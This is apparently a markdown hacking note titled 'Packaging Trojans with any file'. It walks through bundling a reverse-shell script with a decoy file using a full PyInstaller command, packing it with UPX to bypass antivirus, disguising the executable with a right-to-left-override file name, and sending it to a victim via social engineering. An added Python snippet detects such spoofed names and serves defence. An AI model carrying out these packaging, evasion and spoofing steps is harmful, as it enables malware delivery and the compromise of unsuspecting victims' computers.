
CreateTrojanPackage.md


Packaging Trojans with any file

Using App Data

Steps

  • Install PyInstaller

  • Download an icon:

    • Download an icon from IconFinder
    • Set the filters to free and choose high resolution.
    • Download the icon
  • Convert the downloaded PNG to ICO

  • If using requests, use version 2.5.1

    pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py"

Bypassing AV using UPX

  • Download UPX

  • Extract files

  • Use UPX to compress the PyInstaller-generated executable

  • Syntax:

    ./upx "full_path_of_executable" -o "full_path_of_compressed_executable"

Spoofing File Type

  • Copy the right-to-left override character (U+202E), either from below or from the unicode-explorer website.

  • Name the file as file_name-(type_everything_in_reverse_order), then paste the copied character after the -.

    • e.g.: sample_pdf-fdp.exe
      • file_name : sample_pdf
      • spoofing_extension : pdf
      • reverse order of spoofing extension : fdp
      • file_extension : exe
    • spoofed file_name : sample_pdf-‮fdp.exe
  • Search for words ending with exe (for a Windows executable) and remove the - to make the trojan look like a real file.

    • word ending with exe : alexe
    • spoofed file_name : spoofed_alexe.pdf
    • actual file_name : spoofed_alfdp.exe
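
From the detection side, names spoofed this way can be flagged by scanning for bidirectional control characters and comparing the real extension with the one a user would see. The Python below is an added example, not part of the original page; the function names and the extension watch-list are assumptions, and the display approximation handles only a single U+202E running to the end of the name.

```python
import os
import unicodedata

# Bidirectional control characters that can reorder how a name is displayed.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
    "\u200e", "\u200f",                                # LRM, RLM
}
# Assumed watch-list of executable extensions; tune per environment.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".js", ".vbs"}
RLO = "\u202e"


def approx_display(name):
    """Approximate what a bidi-aware UI shows: text after U+202E is reversed.
    Simplification: only one RLO, with the override running to end of name."""
    head, sep, tail = name.partition(RLO)
    return head + tail[::-1] if sep else name


def inspect_filename(name):
    """Return a finding dict for one file name given in logical order."""
    controls = [f"U+{ord(c):04X} {unicodedata.name(c, '?')}"
                for c in name if c in BIDI_CONTROLS]
    real_ext = os.path.splitext(name)[1].lower()   # what the OS will execute
    shown = approx_display(name)
    shown_ext = os.path.splitext(shown)[1].lower() # what the user reads
    return {
        "controls": controls,
        "real_ext": real_ext,
        "shown_ext": shown_ext,
        "displayed_as": shown,
        # Any bidi control in a file name is worth an alert on its own.
        "suspicious": bool(controls),
        # Escalate when an executable is displayed with a different extension.
        "high_severity": bool(controls) and real_ext in EXECUTABLE_EXTS
                         and shown_ext != real_ext,
    }


if __name__ == "__main__":
    # Constructed samples: the two names from the text above plus a benign one.
    for sample in ["sample_pdf-\u202efdp.exe", "spoofed_al\u202efdp.exe", "report.pdf"]:
        print(repr(sample), inspect_filename(sample))
```

The same check can run over mail attachment names, archive listings or endpoint file-creation events, since the control character survives in the stored name even though it is invisible on screen.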

Send File to victim

  • Send the file to the victim through attacks or social engineering.